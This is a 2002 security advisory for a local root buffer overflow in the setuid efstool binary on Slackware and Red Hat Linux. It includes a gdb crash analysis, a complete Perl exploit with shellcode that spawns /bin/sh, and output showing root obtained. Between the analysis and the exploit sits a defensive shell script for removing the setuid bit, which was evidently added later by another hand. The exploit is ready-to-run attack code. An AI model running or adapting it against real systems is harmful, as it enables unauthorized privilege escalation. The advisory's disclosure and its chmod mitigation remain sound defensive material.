efstool.txt

12 Sep 2002 00:00:00. Reported by NTFX. Type: packetstorm. Source: packetstormsecurity.com

Local root exploit for Slackware Linux using EFSTOOL by NTFX from SoldierX.com, 2002.

Code

```text
§+++++++++++++++++++++++++++++++++++++++++++++++§
]|[ [-=- SOLDIERX.COM Presents -=-] ]|[
+++++++++++++++§+++_________________________________________+++§+++++++++++++++
\\//////////////// EFSTOOL LOCAL ROOT EXPLOIT \\\\\\\\\\\\\\\\//
\\\\\\\\\\\\\\\\\______________SLACKWARELINUX_____________/////////////////
\\:::::::::::::::::::::::::::::::: by ::::::::::::::::::::::::::::::::://
\\xxxxxxxxxxxxxxxxxxxxxxxx§-=-][-NTFX-][-=-§xxxxxxxxxxxxxxxxxxxxxxxxx//
\\:::::::::::::::::::::::::::::: of ::::::::::::::::::::::::::::::://
\\ SOLDIERX.COM, LEGION2000 //
\\ September, 2002 //
\\ NOBODY CAN STOP INFORMATION INSEMINATION //
§=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++=§
[ Author's E-mail - [email protected] ]
**********************************************************************
| The author hereby grants permission to reproduce, redistribute, |
| or include this file(s) in your file section, electronic or print |
| newletter, or any other form of transmission that you choose, as |
| long as it is kept intact and whole, with no ommissions, delet- |
| ions, or changes. (C)2002 SOLDIERX.COM - http://www.soldierx.com |
**********************************************************************
```
  
[L2K Advisory ef0001]  
Feb 13th 02  
EFSTOOL LOCAL ROOT  
Author: ntfx <[email protected]>  
Legion2000 Security Research (c)  
Soldierx Dot Com (c)  
Web: http://legion200.security.nu  
Web: http://soldierx.com  
Note: I have previously not written any advisories, so be patient.
  
What is Bonobo (it contains the efstool package)?

Bonobo is a set of language- and system-independent CORBA interfaces for creating reusable components, controls and compound documents.

The Bonobo distribution includes a Gtk+ based implementation of the Bonobo interfaces, enabling developers to create reusable components and applications that can be used to form more complex documents.
  
A condition has been found in efstool, which is shipped with Red Hat Linux / Slackware Linux and possibly others, by which, given the right environment, root privileges can be gained. This depends on the binary having suid permissions.
  
If a user passes 3000 "A" characters as the argument, the program overflows its buffer and segfaults, as shown below.

```
$ /usr/bin/efstool `perl -e 'print "A" x 3000'`
Segmentation fault
```

Now we open the binary in gdb to see what occurred.

```
$ gdb /usr/bin/efstool
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
(gdb) r `perl -e 'print "A" x 3000'`
Starting program: /usr/bin/efstool `perl -e 'print "A" x 3000'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg esp
esp            0xbfffe890       0xbfffe890
(gdb)
```
  
As you can see, the saved return address has been overwritten with 0x41414141, and the value of esp gives us the address to use as the return address.
Return: 0xbfffe890
When execution returns to that address it lands in the NOPs and slides down into the code, which executes a shell in our exploit.

The offset has to be played with for the exploit to work reliably, but an offset of around -1000 / -2000 should work.
  
I have done minimal testing on this, so if it doesn't work fully do not come crying to me. It has been tested on Slackware 7.1.
  
Solution to this: remove suid permissions on the program.

```
# chmod u-s efstool
```
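The fix above is a one-line chmod, but on a real host you also want to confirm which binaries carry the setuid bit and verify the bit is actually gone afterwards. The following POSIX shell functions are an added example and are not part of the original advisory: they check whether a file is setuid, list setuid files beneath a directory, and apply the advisory's `chmod u-s` mitigation with a post-check. The demo runs against a constructed stand-in file in a temporary directory, not the real /usr/bin/efstool.

```shell
#!/bin/sh
# Added example (not from the original advisory): audit and strip the setuid
# bit, the mitigation the advisory recommends for efstool.

# is_setuid PATH -> exit 0 if the setuid bit is set on PATH, 1 otherwise.
is_setuid() {
    [ -u "$1" ]
}

# list_setuid_under DIR -> print setuid regular files beneath DIR, one per line.
# -xdev keeps find on a single filesystem; -perm -4000 matches the setuid bit.
list_setuid_under() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# strip_setuid PATH -> apply the advisory's fix (chmod u-s) and verify it.
# Exit 0 only if PATH is no longer setuid afterwards.
strip_setuid() {
    if is_setuid "$1"; then
        chmod u-s "$1" || return 1
        echo "removed setuid from $1"
    else
        echo "$1 was not setuid"
    fi
    ! is_setuid "$1"
}

# demo -> exercise the functions on a constructed stand-in binary.
# The stand-in is a harmless script owned by the current user; it only
# models the setuid state, not efstool's behaviour.
demo() {
    tmp=$(mktemp -d)
    printf '#!/bin/sh\necho stand-in\n' > "$tmp/efstool"   # constructed file
    chmod 4755 "$tmp/efstool"                              # mark it setuid
    echo "setuid files before fix:"
    list_setuid_under "$tmp"
    strip_setuid "$tmp/efstool"
    echo "setuid files after fix: [$(list_setuid_under "$tmp")]"
    rm -rf "$tmp"
}

# Run the demo only when explicitly requested, so the functions can be
# sourced into another script without side effects.
if [ "${EFSTOOL_AUDIT_DEMO:-0}" = 1 ]; then
    demo
fi
```

On a real system, `list_setuid_under /` run as root gives the inventory of setuid binaries, and `strip_setuid /usr/bin/efstool` applies and verifies the advisory's fix; the `EFSTOOL_AUDIT_DEMO` variable is an assumption of this example, not something efstool or Slackware defines.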
  
Added: Do not confuse this with the other efstool release. Our version was semi-released back on Feb 13th when the original discovery took place. I personally do not like using SecurityFocus for releases, nor have I ever previously bothered with it. - ntfx 10.09
  
Included is the example exploit.

--------------------------cut kitkat.pl---------------------------------
```perl
#!/usr/bin/perl
# Efstool local root exploit (Slackware 8.1)
# Author: ntfx <[email protected]> Feb 13th 2002
# Legion2000 Security Research (c)
# Soldierx Dot Com
# WEB: HTTP://legion2000.security.nu
# WEB: HTTP://soldierx.com
# GREET: Legion2000SR, Soldierx.com, Kat
############################################
# Solution: chmod u-s efstool
############################################
if (! $ARGV[0]) {
    &usage;
    exit;
}

sub usage() {
    print "USAGE: perl $0 <offset> kat\n";
    print "efstool local root by ntfx\n";
    print "Legion2000SR http://legion2000.security.nu\n";
    print "Soldierx http://soldierx.com\n";
    exit(0);
}

$ret    = "0xbfffe890";
$offset = $ARGV[0];
$nop    = "\x90";
$ev1lc0de = "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89".
            "\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3".
            "\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29".
            "\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff".
            "/bin/sh";

if ($ARGV[1] eq "kat") {
    $len = 3000;
    for ($i = 0; $i < ($len - length($ev1lc0de)); $i++) {
        $buffer .= $nop;
    }
    $buffer .= $ev1lc0de;
}
$buffer .= pack('l', ($ret + $offset));
$buffer .= pack('l', ($ret + $offset));

# You will now be privileged..
exec("/usr/bin/efstool $buffer");
sleep 2;
system("id; uname -a");
# This has been a SoldierX/Legion2000 Production.
```
--------------------------cut kitkat.pl---------------------------------
  
```
$ perl kitkat.pl kat
uid=0(root) gid=100(users) groups=100(users)
Linux efstool-exp 2.2.21 #1 Thu Jun 13 03:57:27 BST 2002 i586 unknown
#
```

As you can see, root privileges have been gained, and the `id; uname -a` call run by the script displays the root uid and the uname of the system.
  
ntfx <[email protected]>

```text
_____________________________________________________________________
§=------------------------------]-§-[------------------------------=§
\\ THIS FILE WAS A SOLDIERX PRODUCTION //
\\ http://www.soldierx.com //
\\ NOBODY CAN STOP INFORMATION INSEMINATION //
§=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++=§
```

Vulners AI Score: 7.4 (High risk)